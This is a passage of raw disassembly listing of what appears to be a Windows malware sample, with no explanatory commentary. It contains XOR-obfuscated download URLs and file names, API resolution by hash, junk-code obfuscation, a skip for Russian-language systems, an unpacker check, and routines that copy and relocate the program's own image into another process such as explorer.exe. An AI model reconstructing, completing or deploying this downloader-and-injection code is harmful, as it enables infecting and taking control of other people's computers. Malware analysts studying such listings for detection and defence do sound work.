loc_401BDB: ; CODE XREF: sub_401B6E+82�j
cmp ecx, 98h
ja short loc_401BE5
inc eax
inc ecx
loc_401BE5: ; CODE XREF: sub_401B6E+73�j
add eax, 16h
add ecx, 16h
cmp eax, 0A5h
jl short loc_401BDB
push 7A813811h
xor ebx, ebx
push 1
mov dword_404104, eax
mov [ebp+var_28], ebx
call sub_4010DC
pop ecx
pop ecx
call eax
cmp dword_404104, 0CBh
movzx eax, ax
mov [ebp+var_24], eax
jge short loc_401C24
inc dword_404104
loc_401C24: ; CODE XREF: sub_401B6E+AE�j
push 3
push esi
push offset a@9_ ; "@9_"
call sub_401000
push 67ECDE97h
push 1
call sub_4010DC
add esp, 14h
push ebx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_28]
push ecx
push ebx
push ebx
push esi
call eax
push 2
push esi
push offset aG ; "&g"
call sub_401000
push [ebp+var_28]
lea eax, [ebp+var_48]
push esi
push eax
call dword_403014 ; wsprintfA
add esp, 18h
push 0Fh
pop eax
push 0FFFFFFF9h
pop ecx
loc_401C71: ; CODE XREF: sub_401B6E+116�j
cmp ecx, 0C5h
ja short loc_401C7B
inc eax
inc ecx
loc_401C7B: ; CODE XREF: sub_401B6E+109�j
add eax, 24h
add ecx, 24h
cmp eax, 7Ch
jl short loc_401C71
push 0Dh
push esi
push offset a_bhebVsuFF ; "_bheb{vsu-f{f"
mov dword_404104, eax
call sub_401000
mov edi, dword_403000
add esp, 0Ch
push esi
lea eax, [ebp+var_1B8]
push eax
call edi ; lstrcpy
push 0Ch
push esi
push offset a_NaksruFF ; "_{naksru-f{f"
call sub_401000
add esp, 0Ch
push esi
lea eax, [ebp+var_1A8]
push eax
call edi ; lstrcpy
push 9
push esi
push offset a_eobfFF ; "_eobf-f{f"
call sub_401000
add esp, 0Ch
push esi
lea eax, [ebp+var_198]
push eax
call edi ; lstrcpy
push 0Bh
push esi
push offset a_irlsjnFF ; "_irlsjn-f{f"
call sub_401000
add esp, 0Ch
push esi
lea eax, [ebp+var_188]
push eax
call edi ; lstrcpy
push 0Dh
push esi
push offset a_vogqdpqFF ; "_vogqdpq{-f{f"
call sub_401000
add esp, 0Ch
push esi
lea eax, [ebp+var_178]
push eax
call edi ; lstrcpy
push 9
push esi
push offset a_AtqFF ; "_`atq-f{f"
call sub_401000
add esp, 0Ch
push esi
lea eax, [ebp+var_168]
push eax
call edi ; lstrcpy
push 0Ch
push esi
push offset a_wfiperoFF ; "_wfipero-f{f"
call sub_401000
add esp, 0Ch
push esi
lea eax, [ebp+var_158]
push eax
call edi ; lstrcpy
cmp word ptr [ebp+var_24], 419h
jz loc_402365
call sub_401059
test eax, eax
jnz loc_402365
call sub_4012A6
test al, al
jz short loc_401D70
push ebx
call sub_401436
pop ecx
loc_401D70: ; CODE XREF: sub_401B6E+1F9�j
mov [ebp+var_20], ebx
mov ebx, dword_40300C
loc_401D79: ; CODE XREF: sub_401B6E+596�j
cmp [ebp+var_20], 0
push 24h
push esi
jnz short loc_401D89
push offset aKwws9AQumzfpLn ; "kwws9,,{a{{qumzfp-`ln,sqldp,hdntaoj,"
jmp short loc_401D8E
; ---------------------------------------------------------------------------
loc_401D89: ; CODE XREF: sub_401B6E+212�j
push offset aKwws9RataoIhad ; "kwws9,,ratao`ihad-`ln,sqldp,hdntaoj,"
loc_401D8E: ; CODE XREF: sub_401B6E+219�j
call sub_401000
add esp, 0Ch
push esi
lea eax, [ebp+var_3B8]
push eax
call edi ; lstrcpy
push 3
push esi
push offset a9_ ; "`9_"
call sub_401000
add esp, 0Ch
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 17h
push esi
push offset aQeAvjfpSksBguB ; "qe{avjfp-sks<bgu>bgu75;"
call sub_401000
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 0
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401721
add esp, 0Ch
push 2
push esi
push offset a9 ; "`9"
call sub_401000
add esp, 0Ch
lea eax, [ebp+var_2B8]
push esi
push eax
call edi ; lstrcpy
cmp word ptr [ebp+var_24], 410h
jnz short loc_401E85
lea eax, [ebp+var_1A8]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Ah
push esi
push offset aUptfnbHkk ; "uptfnb{hkk"
call sub_401000
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401721
add esp, 0Ch
mov [ebp+var_C], eax
jmp loc_40208A
; ---------------------------------------------------------------------------
loc_401E85: ; CODE XREF: sub_401B6E+2BB�j
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Eh
push esi
push offset aBdytedrbwuSks ; "bdytedrbwu-sks"
call sub_401000
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401721
push 2
push esi
push offset a9 ; "`9"
mov [ebp+var_C], eax
call sub_401000
add esp, 18h
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_178]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Ch
push esi
push offset aRrqngodlSks ; "rrqngodl-sks"
call sub_401000
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401721
add [ebp+var_C], eax
push 2
push esi
push offset a9 ; "`9"
call sub_401000
add esp, 18h
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 9
push esi
push offset aPwhHSks ; "pwh`h-sks"
call sub_401000
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401721
add [ebp+var_C], eax
push 2
push esi
push offset a9 ; "`9"
call sub_401000
add esp, 18h
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_198]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Dh
push esi
push offset aWeGgmaazSks ; "we{ggmaaz-sks"
call sub_401000
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401721
add [ebp+var_C], eax
push 2
push esi
push offset a9 ; "`9"
call sub_401000
add esp, 18h
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_188]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Bh
push esi
push offset aLljOzaSks ; "llj{oza-sks"
call sub_401000
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401721
add esp, 0Ch
add [ebp+var_C], eax
loc_40208A: ; CODE XREF: sub_401B6E+312�j
push 2
push esi
push offset a9 ; "`9"
call sub_401000
add esp, 0Ch
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_158]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 7
push esi
push offset aGrurkqn ; "grurkqn"
call sub_401000
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401721
add eax, [ebp+var_C]
add esp, 0Ch
test eax, eax
jg short loc_40210F
inc [ebp+var_20]
cmp [ebp+var_20], 2
jl loc_401D79
jmp loc_402363
; ---------------------------------------------------------------------------
loc_40210F: ; CODE XREF: sub_401B6E+58D�j
push 3
push esi
push offset a9_ ; "`9_"
call sub_401000
add esp, 0Ch
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
cmp dword_404104, 0
jl short loc_402155
inc dword_404104
loc_402155: ; CODE XREF: sub_401B6E+5DF�j
cmp dword_404104, 0DAh
jle short loc_40216B
mov dword_404104, 20h
loc_40216B: ; CODE XREF: sub_401B6E+5F1�j
push 1Ch
push esi
push offset aNobjtSksBguBgu ; "nobjt{-sks<bgu>bgu75;%`lgf2>"
call sub_401000
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 270118E2h
push 1
call sub_4010DC
pop ecx
pop ecx
lea ecx, [ebp+var_38]
push ecx
call eax
mov eax, dword_404104
add eax, 0FFFFFFDAh
cmp eax, 0B6h
ja short loc_4021AE
inc dword_404104
loc_4021AE: ; CODE XREF: sub_401B6E+638�j
push 2
push esi
mov edi, offset aV ; "&v"
push edi
call sub_401000
movzx eax, [ebp+var_30]
push eax
lea eax, [ebp+var_8]
push esi
push eax
call dword_403014 ; wsprintfA
mov al, byte ptr [ebp+var_8]
add al, 1Dh
add esp, 18h
cmp byte ptr [ebp+var_8+1], 0
mov [ebp+var_13], al
jnz short loc_4021E3
mov [ebp+var_11], 30h
jmp short loc_4021EB
; ---------------------------------------------------------------------------
loc_4021E3: ; CODE XREF: sub_401B6E+66D�j
mov al, byte ptr [ebp+var_8+1]
add al, 13h
mov [ebp+var_11], al
loc_4021EB: ; CODE XREF: sub_401B6E+673�j
push 18h
pop eax
push 0FFFFFFC4h
pop ecx
loc_4021F1: ; CODE XREF: sub_401B6E+695�j
cmp ecx, 74h
ja short loc_4021F8
inc eax
inc ecx
loc_4021F8: ; CODE XREF: sub_401B6E+686�j
add eax, 2Dh
add ecx, 2Dh
cmp eax, 0A2h
jl short loc_4021F1
push 2
push esi
push edi
mov dword_404104, eax
call sub_401000
movzx eax, [ebp+var_2E]
push eax
lea eax, [ebp+var_4]
push esi
push eax
call dword_403014 ; wsprintfA
mov al, byte ptr [ebp+var_4]
add al, 17h
add esp, 18h
cmp byte ptr [ebp+var_4+1], 0
mov [ebp+var_14], al
jnz short loc_40223A
mov [ebp+var_12], 30h
jmp short loc_402242
; ---------------------------------------------------------------------------
loc_40223A: ; CODE XREF: sub_401B6E+6C4�j
mov al, byte ptr [ebp+var_4+1]
add al, 19h
mov [ebp+var_12], al
loc_402242: ; CODE XREF: sub_401B6E+6CA�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_148]
push eax
mov [ebp+var_10], 0
call ebx ; lstrcat
push 7
push esi
push offset aLgf1 ; "%`lgf1>"
call sub_401000
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 270118E2h
push 1
call sub_4010DC
pop ecx
pop ecx
lea ecx, [ebp+var_38]
push ecx
call eax
mov eax, dword_404104
add eax, 0FFFFFFB1h
cmp eax, 96h
ja short loc_402296
inc dword_404104
loc_402296: ; CODE XREF: sub_401B6E+720�j
push 2
push esi
push edi
call sub_401000
movzx eax, [ebp+var_30]
push eax
lea eax, [ebp+var_8]
push esi
push eax
call dword_403014 ; wsprintfA
mov ax, [ebp+var_8]
add esp, 18h
test ah, ah
mov [ebp+var_1B], al
mov [ebp+var_1A], 30h
jz short loc_4022C4
mov [ebp+var_1A], ah
loc_4022C4: ; CODE XREF: sub_401B6E+751�j
cmp dword_404104, 58h
jge short loc_4022D3
inc dword_404104
loc_4022D3: ; CODE XREF: sub_401B6E+75D�j
push 2
push esi
push edi
call sub_401000
movzx eax, [ebp+var_2E]
push eax
lea eax, [ebp+var_4]
push esi
push eax
call dword_403014 ; wsprintfA
mov ax, [ebp+var_4]
add esp, 18h
test ah, ah
mov [ebp+var_19], al
mov [ebp+var_1C], 30h
jz short loc_402301
mov [ebp+var_1C], ah
loc_402301: ; CODE XREF: sub_401B6E+78E�j
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_148]
push eax
mov [ebp+var_18], 0
call ebx ; lstrcat
push 4
push esi
push offset aJg ; "%jg>"
call sub_401000
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 0
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401721
add esp, 0Ch
cmp dword_404104, 0C3h
jge short loc_402363
inc dword_404104
loc_402363: ; CODE XREF: sub_401B6E+59C�j
; sub_401B6E+7ED�j
xor ebx, ebx
loc_402365: ; CODE XREF: sub_401B6E+1DF�j
; sub_401B6E+1EC�j
push 95902B19h
push 1
call sub_4010DC
pop ecx
pop ecx
push ebx
call eax
pop edi
pop esi
pop ebx
leave
retn
sub_401B6E endp
; =============== S U B R O U T I N E =======================================
sub_40237B proc near ; DATA XREF: sub_40275A+60�o
push esi
push edi
mov edi, 81F0F0DFh
push edi
push 1
call sub_4010DC
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
jmp short loc_4023C3
; ---------------------------------------------------------------------------
loc_402391: ; CODE XREF: sub_40237B+4F�j
push 1297812Ch
push 1
call sub_4010DC
pop ecx
pop ecx
call eax
cmp eax, 2
jz short loc_4023CC
push 3D9972F5h
push 1
call sub_4010DC
pop ecx
pop ecx
push 3E8h
call eax
push edi
push 1
call sub_4010DC
loc_4023C3: ; CODE XREF: sub_40237B+14�j
pop ecx
pop ecx
push esi
call eax
test eax, eax
jz short loc_402391
loc_4023CC: ; CODE XREF: sub_40237B+29�j
pop edi
xor eax, eax
pop esi
retn 4
sub_40237B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4023D3 proc near ; CODE XREF: sub_40275A+14E�p
; sub_402908+141�p ...
var_310 = dword ptr -310h
var_260 = dword ptr -260h
var_44 = byte ptr -44h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 310h
push ebx
push esi
push edi
call sub_4010D8
and eax, 0FFFF0000h
mov ecx, [eax+3Ch]
add ecx, eax
mov [ebp+var_18], eax
lea eax, [ecx+18h]
mov esi, [eax+38h]
mov [ebp+var_14], eax
mov eax, dword_404104
add eax, 0FFFFFFA7h
cmp eax, 7Dh
mov [ebp+var_24], ecx
mov [ebp+var_1C], esi
ja short loc_402413
inc dword_404104
loc_402413: ; CODE XREF: sub_4023D3+38�j
push 0A08B638Ch
xor ebx, ebx
push 1
mov [ebp+var_1], bl
call sub_4010DC
pop ecx
pop ecx
push 9
call eax
mov edi, eax
neg edi
sbb edi, edi
and edi, 3Ch
add edi, 4
cmp dword_404104, 0DFh
jge short loc_402448
inc dword_404104
loc_402448: ; CODE XREF: sub_4023D3+6D�j
push 0EF0A25B7h
push 1
call sub_4010DC
pop ecx
pop ecx
push ebx
push esi
push ebx
push edi
push ebx
push 0FFFFFFFFh
call eax
cmp eax, ebx
mov [ebp+var_C], eax
jnz short loc_40246D
xor al, al
jmp loc_402755
; ---------------------------------------------------------------------------
loc_40246D: ; CODE XREF: sub_4023D3+91�j
push 5CD9430h
push 1
call sub_4010DC
pop ecx
pop ecx
push ebx
push ebx
push ebx
push 2
push [ebp+var_C]
call eax
cmp eax, ebx
mov [ebp+var_8], eax
jz loc_40271A
cmp dword_404104, 3
jl short loc_40249F
inc dword_404104
loc_40249F: ; CODE XREF: sub_4023D3+C4�j
cmp dword_404104, 0F4h
jle short loc_4024B5
mov dword_404104, 19h
loc_4024B5: ; CODE XREF: sub_4023D3+D6�j
push 12h
mov esi, offset dword_404108
push esi
push offset aMwnbsujftlepfW ; "MwNbsUjftLePf`wjlm"
call sub_401000
add esp, 0Ch
push esi
lea eax, [ebp+var_44]
push eax
call dword_403000 ; lstrcpy
push 9
push esi
push offset aMwgooGoo ; "mwgoo-goo"
call sub_401000
push 0C8AC8026h
push 1
call sub_4010DC
add esp, 14h
push esi
call eax
push 1FC0EAEEh
push 1
mov esi, eax
call sub_4010DC
pop ecx
pop ecx
lea ecx, [ebp+var_44]
push ecx
push esi
call eax
push 4Eh
pop ecx
push 0FFFFFFF1h
mov [ebp+var_10], ebx
pop edx
loc_402514: ; CODE XREF: sub_4023D3+157�j
cmp edx, 99h
ja short loc_40251E
inc ecx
inc edx
loc_40251E: ; CODE XREF: sub_4023D3+147�j
add ecx, 0Dh
add edx, 0Dh
cmp ecx, 0B3h
jl short loc_402514
mov esi, [ebp+var_1C]
push edi
push ebx
push 1
mov dword_404104, ecx
lea ecx, [ebp+var_20]
push ecx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_10]
push ecx
push [ebp+arg_4]
mov [ebp+var_20], esi
push [ebp+var_C]
call eax
mov edi, [ebp+var_18]
push esi
push edi
push [ebp+var_8]
call sub_4010B3
mov eax, dword_404104
lea ecx, [eax-6]
add esp, 0Ch
cmp ecx, 0C3h
ja short loc_402575
inc eax
mov dword_404104, eax
loc_402575: ; CODE XREF: sub_4023D3+19A�j
mov ecx, [ebp+var_24]
movzx ecx, word ptr [ecx+14h]
add ecx, [ebp+var_14]
cmp eax, 27h
jge short loc_40258A
inc eax
mov dword_404104, eax
loc_40258A: ; CODE XREF: sub_4023D3+1AF�j
mov esi, [ebp+var_10]
mov edx, esi
sub edx, edi
mov [ebp+var_14], edx
lea edx, [eax-2Ah]
cmp edx, 0C8h
ja short loc_4025A5
inc eax
mov dword_404104, eax
loc_4025A5: ; CODE XREF: sub_4023D3+1CA�j
mov eax, [ecx+34h]
add eax, edi
loc_4025AA: ; CODE XREF: sub_4023D3+1E8�j
cmp word ptr [eax], 0BE8Dh
jnz short loc_4025BA
cmp dword ptr [eax+6], 0C009078Bh
jz short loc_4025BD
loc_4025BA: ; CODE XREF: sub_4023D3+1DC�j
inc eax
jmp short loc_4025AA
; ---------------------------------------------------------------------------
loc_4025BD: ; CODE XREF: sub_4023D3+1E5�j
mov eax, [eax+2]
add eax, [ecx+0Ch]
add eax, edi
jmp short loc_4025D4
; ---------------------------------------------------------------------------
loc_4025C7: ; CODE XREF: sub_4023D3+203�j
add eax, 8
jmp short loc_4025CD
; ---------------------------------------------------------------------------
loc_4025CC: ; CODE XREF: sub_4023D3+1FD�j
inc eax
loc_4025CD: ; CODE XREF: sub_4023D3+1F7�j
cmp [eax], bx
jnz short loc_4025CC
inc eax
inc eax
loc_4025D4: ; CODE XREF: sub_4023D3+1F2�j
cmp [eax], ebx
jnz short loc_4025C7
push 2Ch
pop edi
push 0FFFFFFC8h
pop edx
loc_4025DE: ; CODE XREF: sub_4023D3+21E�j
cmp edx, 70h
ja short loc_4025E5
inc edi
inc edx
loc_4025E5: ; CODE XREF: sub_4023D3+20E�j
add edi, 1Bh
add edx, 1Bh
cmp edi, 97h
jl short loc_4025DE
mov edx, [ebp+var_8]
mov dword_404104, edi
mov ecx, [ecx+0Ch]
add eax, 4
lea edx, [ecx+edx-4]
mov cl, [eax]
inc eax
cmp cl, bl
jz short loc_40263D
loc_40260D: ; CODE XREF: sub_4023D3+25F�j
cmp cl, 0F0h
jnb short loc_402619
movzx ecx, cl
add edx, ecx
jmp short loc_402628
; ---------------------------------------------------------------------------
loc_402619: ; CODE XREF: sub_4023D3+23D�j
movzx esi, word ptr [eax]
and ecx, 0Fh
shl ecx, 10h
or ecx, esi
add edx, ecx
inc eax
inc eax
loc_402628: ; CODE XREF: sub_4023D3+244�j
mov ecx, [ebp+var_14]
add [edx], ecx
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_40260D
mov esi, [ebp+var_10]
mov edi, dword_404104
loc_40263D: ; CODE XREF: sub_4023D3+238�j
lea eax, [edi-9]
cmp eax, 0D5h
ja short loc_40264E
inc edi
mov dword_404104, edi
loc_40264E: ; CODE XREF: sub_4023D3+272�j
sub esi, [ebp+var_18]
add esi, [ebp+arg_0]
cmp [ebp+arg_8], ebx
mov edi, esi
jnz short loc_40269F
push 0E61874B3h
push 1
call sub_4010DC
pop ecx
pop ecx
push ebx
push ebx
push ebx
push edi
push ebx
push ebx
push [ebp+arg_4]
call eax
push 723EB0D5h
push 1
mov edi, eax
call sub_4010DC
pop ecx
pop ecx
push edi
call eax
cmp dword_404104, 0A7h
mov [ebp+var_1], 1
jge short loc_402707
inc dword_404104
jmp short loc_402707
; ---------------------------------------------------------------------------
loc_40269F: ; CODE XREF: sub_4023D3+286�j
push 0AA1DE02Fh
push 1
mov [ebp+var_310], 10002h
call sub_4010DC
pop ecx
pop ecx
lea ecx, [ebp+var_310]
push ecx
push [ebp+arg_8]
call eax
push 0AA1DC82Fh
push 1
mov [ebp+var_260], edi
call sub_4010DC
pop ecx
pop ecx
lea ecx, [ebp+var_310]
push ecx
push [ebp+arg_8]
call eax
push 28h
xor ecx, ecx
mov [ebp+var_1], 1
pop eax
inc ecx
loc_4026ED: ; CODE XREF: sub_4023D3+32D�j
cmp ecx, 0C7h
ja short loc_4026F7
inc eax
inc ecx
loc_4026F7: ; CODE XREF: sub_4023D3+320�j
add eax, 2Ch
add ecx, 2Ch
cmp eax, 6Ah
jl short loc_4026ED
mov dword_404104, eax
loc_402707: ; CODE XREF: sub_4023D3+2C2�j
; sub_4023D3+2CA�j
push 77CD9567h
push 1
call sub_4010DC
pop ecx
pop ecx
push [ebp+var_8]
call eax
loc_40271A: ; CODE XREF: sub_4023D3+B7�j
push 723EB0D5h
push 1
call sub_4010DC
pop ecx
pop ecx
push [ebp+var_C]
call eax
cmp dword_404104, 0Dh
jl short loc_40273C
inc dword_404104
loc_40273C: ; CODE XREF: sub_4023D3+361�j
cmp dword_404104, 0F3h
jle short loc_402752
mov dword_404104, 21h
loc_402752: ; CODE XREF: sub_4023D3+373�j
mov al, [ebp+var_1]
loc_402755: ; CODE XREF: sub_4023D3+95�j
pop edi
pop esi
pop ebx
leave
retn
sub_4023D3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40275A proc near ; DATA XREF: sub_402908+13C�o
; sub_402908+31F�o
var_14C = byte ptr -14Ch
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14Ch
push ebx
push edi
xor ebx, ebx
push 3D9972F5h
inc ebx
push ebx
call sub_4010DC
pop ecx
pop ecx
push 7D0h
call eax
cmp dword_404104, 0Ch
jl short loc_40278B
inc dword_404104
loc_40278B: ; CODE XREF: sub_40275A+29�j
cmp dword_404104, 0F1h
jle short loc_4027A1
mov dword_404104, 22h
loc_4027A1: ; CODE XREF: sub_40275A+3B�j
push esi
push 6FB89AF0h
xor edi, edi
push ebx
mov [ebp+var_4], edi
call sub_4010DC
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push edi
push edi
push offset sub_40237B
push edi
push edi
call eax
push 723EB0D5h
push ebx
mov esi, eax
call sub_4010DC
pop ecx
pop ecx
push esi
call eax
push 49A1374Ah
push ebx
call sub_4010DC
pop ecx
pop ecx
push 104h
lea ecx, [ebp+var_14C]
push ecx
call eax
push 0Ch
mov esi, offset dword_404108
push esi
push offset a_puKlpwFF ; "_pu`klpw-f{f"
call sub_401000
add esp, 0Ch
push esi
lea eax, [ebp+var_14C]
push eax
call dword_40300C ; lstrcat
push 4Bh
pop esi
push 29h
pop eax
loc_402819: ; CODE XREF: sub_40275A+D1�j
cmp eax, 0B4h
ja short loc_402822
inc esi
inc eax
loc_402822: ; CODE XREF: sub_40275A+C4�j
add esi, 31h
add eax, 31h
cmp esi, 7Fh
jl short loc_402819
push 40h
lea eax, [ebp+var_44]
push edi
push eax
mov dword_404104, esi
mov [ebp+var_48], 44h
call sub_401080
add esp, 0Ch
cmp esi, 9
mov [ebp+var_1C], ebx
mov [ebp+var_18], 5
jl short loc_40285E
inc esi
mov dword_404104, esi
loc_40285E: ; CODE XREF: sub_40275A+FB�j
cmp esi, 0E2h
jle short loc_402870
mov dword_404104, 20h
loc_402870: ; CODE XREF: sub_40275A+10A�j
push 46318AC7h
push ebx
call sub_4010DC
pop ecx
pop ecx
push offset dword_40420C
lea ecx, [ebp+var_48]
push ecx
push edi
push edi
push 4
push edi
push edi
push edi
lea ecx, [ebp+var_14C]
push ecx
push edi
call eax
push dword_404210
push dword_40420C
push offset sub_401B6E
call sub_4023D3
add esp, 0Ch
test al, al
jz short loc_4028CA
mov esi, dword_404210
push 7B88BF3Bh
push ebx
call sub_4010DC
pop ecx
pop ecx
push esi
call eax
loc_4028CA: ; CODE XREF: sub_40275A+158�j
cmp dword_404104, 7
pop esi
jl short loc_4028DA
inc dword_404104
loc_4028DA: ; CODE XREF: sub_40275A+178�j
cmp dword_404104, 0ACh
jle short loc_4028F0
mov dword_404104, 21h
loc_4028F0: ; CODE XREF: sub_40275A+18A�j
push 768AA260h
push ebx
call sub_4010DC
pop ecx
pop ecx
push edi
call eax
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_40275A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402908 proc near ; CODE XREF: start+1BC�j
var_13C = byte ptr -13Ch
var_13B = byte ptr -13Bh
var_38 = byte ptr -38h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
push edi
lea ebx, [ebp+var_13C]
call sub_4012A6
test al, al
jz loc_402C55
cmp dword_404104, 4
jl short loc_402936
inc dword_404104
loc_402936: ; CODE XREF: sub_402908+26�j
cmp dword_404104, 0ABh
jle short loc_40294C
mov dword_404104, 20h
loc_40294C: ; CODE XREF: sub_402908+38�j
mov edi, 774393E8h
push edi
push 1
call sub_4010DC
pop ecx
pop ecx
mov esi, 104h
push esi
lea ecx, [ebp+var_13C]
push ecx
push 0
call eax
xor ecx, ecx
test eax, eax
jz short loc_402986
loc_402972: ; CODE XREF: sub_402908+7C�j
lea edx, [ebp+ecx+var_13B]
cmp byte ptr [edx-1], 5Ch
jnz short loc_402981
mov ebx, edx
loc_402981: ; CODE XREF: sub_402908+75�j
inc ecx
cmp ecx, eax
jnz short loc_402972
loc_402986: ; CODE XREF: sub_402908+68�j
mov ecx, [ebx]
mov eax, 20202020h
or ecx, eax
cmp ecx, 6C707865h
jnz loc_402A7B
mov ecx, [ebx+4]
or ecx, eax
cmp ecx, 7265726Fh
jnz loc_402A7B
mov ecx, [ebx+8]
or ecx, eax
cmp ecx, 6578652Eh
jnz loc_402A7B
mov eax, [ebp+arg_4]
dec eax
jnz loc_402A74
push 8
pop ecx
push 0Ch
mov esi, offset dword_404108
xor eax, eax
push esi
lea edi, [ebp+var_38]
push offset aFSolqfqFF ; "f{solqfq-f{f"
rep stosd
call sub_401000
add esp, 0Ch
push esi
lea eax, [ebp+var_38]
push eax
call dword_403000 ; lstrcpy
lea eax, [ebp+var_38]
push eax
call sub_401436
mov esi, eax
test esi, esi
pop ecx
jz short loc_402A74
push 3Ah
pop eax
push 28h
pop ecx
loc_402A07: ; CODE XREF: sub_402908+114�j
cmp ecx, 0C5h
ja short loc_402A11
inc eax
inc ecx
loc_402A11: ; CODE XREF: sub_402908+105�j
add eax, 18h
add ecx, 18h
cmp eax, 97h
jl short loc_402A07
push 99A4299Dh
push 1
mov dword_404104, eax
call sub_4010DC
pop ecx
pop ecx
push esi
push 0
push 1F0FFFh
call eax
mov esi, eax
test esi, esi
jz short loc_402A74
push 0
push esi
push offset sub_40275A
call sub_4023D3
add esp, 0Ch
cmp dword_404104, 0A8h
jge short loc_402A63
inc dword_404104
loc_402A63: ; CODE XREF: sub_402908+153�j
push 723EB0D5h
push 1
call sub_4010DC
pop ecx
pop ecx
push esi
call eax
loc_402A74: ; CODE XREF: sub_402908+B9�j
; sub_402908+F7�j ...
xor eax, eax
jmp loc_402C8E
; ---------------------------------------------------------------------------
loc_402A7B: ; CODE XREF: sub_402908+8D�j
; sub_402908+9E�j ...
push edi
push 1
call sub_4010DC
pop ecx
pop ecx
push esi
